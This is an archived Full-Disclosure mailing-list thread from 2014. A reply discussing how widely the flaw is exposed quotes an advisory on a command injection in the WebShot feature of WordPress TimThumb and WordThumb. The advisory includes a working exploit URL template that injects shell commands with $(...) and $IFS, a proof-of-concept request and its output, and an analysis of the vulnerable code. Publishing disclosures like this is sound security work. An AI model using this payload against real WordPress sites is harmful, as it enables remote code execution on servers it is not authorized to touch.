lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 24 Jun 2014 21:12:26 +0200
From: Ryan Dewhurst <ryandewhurst@...il.com>
To: Pichaya Morimoto <pichaya@...e.org>
Cc: fulldisclosure@...lists.org,
	full-disclosure <full-disclosure@...ts.grok.org.uk>, submit@...sec.com
Subject: Re: [FD] Wordpress TimThumb 2.8.13 WebShot Remote Code Execution
	(0-day)

Not had chance to look into it in any depth but you said that webshot needs
to be enabled for the exploit to work and you also said that
the wordpress-gallery-plugin was vulnerable.

Looking at wordpress-gallery-plugin's repository it seems webshot is
disabled in their timrhumb file:

https://github.com/wp-plugins/wordpress-gallery-plugin/blob/37e60d5b7fd1ed3779b82618c5098d459bc8c056/timthumb.php#L114

Quick search on Github for the WEBSHOT_ENABLED constant being set to true
doesn't yield many results:

https://github.com/search?q=%22define+%28%27WEBSHOT_ENABLED%27%2C+true%29%3B%22&type=Code&ref=searchresults

I wonder how many WordPress 'assets' (plugins/themes) are affected by this.


On Tue, Jun 24, 2014 at 10:24 AM, Pichaya Morimoto <pichaya@...e.org> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> ######################################################################
> #  _     ___  _   _  ____  ____    _  _____
> #  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
> #  | |  | | | |  \| | |  _| |     / _ \ | |
> #  | |__| |_| | |\  | |_| | |___ / ___ \| |
> #  |_____\___/|_| \_|\____|\____/_/   \_\_|
> #
> # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
> # Affected website : a lot Wordpress Themes, Plugins, 3rd party components
> # Exploit Author : @u0x (Pichaya Morimoto)
> # Release dates : June 24, 2014
> #
> # Special Thanks to 2600 Thailand group
> # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
> # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
> #
> ########################################################################
>
> [+] Description
> ============================================================
> TimThumb is a small php script for cropping, zooming and resizing web
> images (jpg, png, gif). Perfect for use on blogs and other applications.
> Developed for use in the WordPress theme Mimbo Pro, and since used in many
> other WordPress themes.
>
> http://www.binarymoon.co.uk/projects/timthumb/
> https://code.google.com/p/timthumb/
>
> The original project  WordThumb 1.07 also vulnerable (
> https://code.google.com/p/wordthumb/)
> They both shared exactly the same WebShot code! And there are several
> projects that shipped with "timthumb.php", such as,
> Wordpress Gallery Plugin
> https://wordpress.org/plugins/wordpress-gallery-plugin/
> IGIT Posts Slider Widget
> http://wordpress.org/plugins/igit-posts-slider-widget/
>
> All themes from http://themify.me/ contains vulnerable "wordthumb" in
> "<theme-name>/themify/img.php".
>
> [+] Exploit
> ============================================================
> http://
>
> <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://
> <wp-website>$(<os-cmds>)
>
> ** Note that OS commands payload MUST be within following character sets:
> [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]
>
> ** Spaces, Pipe, GT sign are not allowed.
> ** This WebShot feature is DISABLED by default.
> ** CutyCapt and XVFB must be installed in constants.
>
> [+] Proof-of-Concept
> ============================================================
> There are couple techniques that can be used to bypass limited charsets but
> I will use a shell variable $IFS insteads of space in this scenario.
>
> PoC Environment:
> Ubuntu 14.04 LTS
> PHP 5.5.9
> Wordpress 3.9.1
> Themify Parallax Theme 1.5.2
> WordThumb 1.07
>
> Crafted Exploit:
>
> http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)
>
> GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=
> http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
> Host: longcatlab.local
> Proxy-Connection: keep-alive
> Cache-Control: max-age=0
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
> Gecko) Chrome/35.0.1916.153 Safari/537.36
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: en-US,en;q=0.8
> Cookie: woocommerce_recently_viewed=9%7C12%7C16;
> wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce;
> wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;
> wordpress_test_cookie=WP+Cookie+check;
>
> wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685
>
> HTTP/1.1 400 Bad Request
> Date: Tue, 24 Jun 2014 07:20:48 GMT
> Server: Apache
> X-Powered-By: PHP/5.5.9-1ubuntu4
> X-Content-Type-Options: nosniff
> X-Frame-Options: sameorigin
> Content-Length: 3059
> Connection: close
> Content-Type: text/html
>
> …
> <a href='http://www.php.net/function.getimagesize'
> target='_new'>getimagesize</a>
> (  )</td><td
>
> title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php'
> bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr>
> </table></font>
> <h1>A WordThumb error has occured</h1>The following error(s) occured:<br
> /><ul><li>The image being resized is not a valid gif, jpg or
> png.</li></ul><br /><br />Query String : webshot=1&amp;src=
> http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version :
> 1.07</pre>
>
> Even it response with error messages but injected OS command has already
> been executed.
>
> $ ls /tmp/longcat -lha
> - -rw-r--r-- 1 www-data www-data 0 มิ.ย.  24 14:20 /tmp/longcat
>
>
> [+] Vulnerability Analysis
> ============================================================
> https://timthumb.googlecode.com/svn/trunk/timthumb.php
>
> Filename: timthumb.php
>
> if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);
> if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT',
> '/usr/local/bin/CutyCapt');
> if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB',
> '/usr/bin/xvfb-run');
> ...
> timthumb::start(); ← start script
> ...
> public static function start(){
> $tim = new timthumb(); ← create timthumb object, call __construct()
> ...
> $tim->run();
> ...
> public function __construct(){
> ...
> $this->src = $this->param('src'); ← set "src" variable to HTTP GET "src"
> parameter
> …
> if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){
> ...
> $this->isURL = true; ← prefix http/s result in isURL = true
> }
> ...
>
> protected function param($property, $default = ''){
> if (isset ($_GET[$property])) {
> return $_GET[$property];
> ...
>
> public function run(){
> if($this->isURL){
> ...
> if($this->param('webshot')){ ← HTTP GET "webshot" must submitted
> if(WEBSHOT_ENABLED){ ← this pre-defined constant must be true
> ...
> $this->serveWebshot(); ← call webshot feature
> } else {
> ...
>
> protected function serveWebshot(){
> ...
> if(! is_file(WEBSHOT_CUTYCAPT)){ ← check existing of cutycapt
> return $this->error("CutyCapt is not installed. $instr");
> }
> if(! is_file(WEBSHOT_XVFB)){ ← check existing of xvfb
> return $this->Error("Xvfb is not installed. $instr");
> }
> ...
> $url = $this->src;
> if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ← check valid
> URL #LoL
> return $this->error("Invalid URL supplied.");
> }
> $url =
> preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/',
> '', $url);  ← check valid URL as specified in RFC 3986
> http://www.ietf.org/rfc/rfc3986.txt
> ...
> if(WEBSHOT_XVFB_RUNNING){
> putenv('DISPLAY=:100.0');
> $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\"
> --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
> --js-can-open-windows=off --url=\"$url\" --out-format=$format
> --out=$tempfile"; ← OS shell command injection
> } else {
> $command = "$xv --server-args=\"-screen 0,
> {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout
> --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
> --js-can-open-windows=off --url=\"$url\" --out-format=$format
> --out=$tempfile"; ← OS shell command injection
> }
> ...
> $out = `$command`;  ← execute $command as shell command
>
> "PHP supports one execution operator: backticks (``). Note that these are
> not single-quotes! PHP will attempt to execute the contents of the
> backticks as a shell command." -
> http://www.php.net//manual/en/language.operators.execution.php
>
> "$url" is failed to escape "$()" in "$command" which is result in arbitrary
> code execution.
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
>
> iQIcBAEBCgAGBQJTqTTsAAoJEB2kHapd1XMUy+cP/2ulCS1R8bXDda7R0PIfn9g9
> FEECoLFV2tav1mSnWzuccvWA3vl3g8SUv/Y7GCKs824GVauhcestUUCpVKdCS3Gu
> 8ypfXOdecE+8ykoPhWfj2FWcKNpXTdCoMz8TugVkNM3+SS0akWYWqHeamXCqc3SK
> ZAiKfYQZ/jvVRRo8n/AAWYv5e8hZLmE6qiLGdTFrsH7VtkABIM5lc88o8qg6RU5x
> zg87khZxU+HtJdzN/gH0X6DL7+NJe6HOqun/+V8pm/5JEDUSpiWZIM1xpyIY6GqW
> UnU25UkSt1u+PnLX7KhqxUANU230BY9Ny7BIhp/q1iRvrKTIHK0WYEL3M96YOND2
> +o2YJthfL7zm9k8XMoF2GQaaeqAnWjGmQC9Oo4ogF57X0Qzb1mwUd01db/R5fgPf
> 9IILnpWV2KLq57R3sdVesriEhTNW34Cqf77wS3P5Y5o2csbFL0OspulOVPM1uJTp
> S1sjuEL5gK3nJqzo7K2ihxdmm3o2hA9QXyn8GjTRu6ESZ26hSZgUEyC6P26yAt0Y
> IHuqML3y9guC720BkNoc1gZZNejgqGHUdc6EXzqO9njZFx5DPtDtf3M0f6uZfH/C
> knB9E32Lo9EFu2S/bjblgOQQUPNtKRNURpsGArx2eilPMdThGLZANFPIzvxYSlrz
> cnw4vN4tY8POL5FF7+gF
> =jAL1
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists